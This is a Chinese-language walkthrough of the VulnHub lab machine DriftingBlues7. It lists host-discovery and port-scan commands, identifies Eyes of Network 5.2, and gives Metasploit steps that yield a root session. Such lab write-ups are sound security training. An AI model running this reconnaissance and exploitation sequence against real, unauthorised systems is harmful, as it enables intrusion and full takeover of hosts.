靶机渗透练习08-driftingblues7 (msf的简单利用)

靶机地址: https://www.vulnhub.com/entry/driftingblues-7,680/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.21
22—ssh—OpenSSH 7.4 (protocol 2.0)
66—http—SimpleHTTPServer 0.6 (Python 2.7.5)
80—http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
111—rpcbind—2-4 (RPC #100000)
443—ssl/http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
2403—taskmaster2000?
3306—mysql—MariaDB (unauthorized)
8086—http—InfluxDB http admin 1.7.9

3、老样子,还是先从80端口入手
靶机渗透练习08-driftingblues7 (msf的简单利用)_第1张图片
映入演练的就是一个大大的eyes of network

4、百度搜了一下发现是一个开源的监控方案
靶机渗透练习08-driftingblues7 (msf的简单利用)_第2张图片
既然如此直接在msf里看看有没有exp
靶机渗透练习08-driftingblues7 (msf的简单利用)_第3张图片
ok,有一个可以直接用的exp,我们直接尝试利用看看呗(其实应该是先知道网站上的版本)
在源代码中,有很多css,逐一点开可以在其中一个发现network的版本为5.2,在我们exp适用的版本内

https://192.168.111.21/css/eonweb.css

靶机渗透练习08-driftingblues7 (msf的简单利用)_第4张图片
5、msf漏洞利用

搜索漏洞:search eyes of network
使用模块: use 0
设置 kali: set lhost 192.168.111.7
设置攻击目录: set rhosts 192.168.111.21
运行模块: run

靶机渗透练习08-driftingblues7 (msf的简单利用)_第5张图片
利用成功,getuid发现直接是root权限了。。好家伙
靶机渗透练习08-driftingblues7 (msf的简单利用)_第6张图片
完结散花~

总结:
1、信息收集很重要,包括目录扫描,源代码探查等
2、searchsploit 、msf 工具的使用

参考:鹏组安全师傅的wp

你可能感兴趣的:(和我一起来打靶!,渗透测试,web安全)